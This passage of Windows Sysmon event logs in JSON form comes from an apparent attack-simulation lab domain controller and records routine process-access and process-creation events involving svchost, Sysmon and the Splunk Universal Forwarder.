C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3485,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3486,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3487,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-00104E4C0500}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-00104E4C0500}","TargetProcessId":"4656","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3488,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.237\r\nProcessGuid: {A837DB8D-023C-5F25-0000-0010094D0500}\r\nProcessId: 4676\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023C-5F25-0000-00104E4C0500}\r\nParentProcessId: 4656\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.237","ProcessGuid":"{A837DB8D-023C-5F25-0000-0010094D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023C-5F25-0000-00104E4C0500}","ParentProcessId":"4656","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3489,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-023C-5F25-0000-00104E4C0500}\r\nSourceProcessId: 4656\r\nSourceThreadId: 4668\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010094D0500}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-023C-5F25-0000-00104E4C0500}","SourceProcessId":"4656","SourceThreadId":"4668","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010094D0500}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3490,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010094D0500}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010094D0500}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3491,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3492,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3493,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 